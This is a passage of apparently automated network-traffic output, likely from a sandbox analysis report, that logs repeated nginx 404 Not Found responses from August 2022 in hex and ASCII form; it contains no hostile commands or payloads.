65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:50 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:58 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 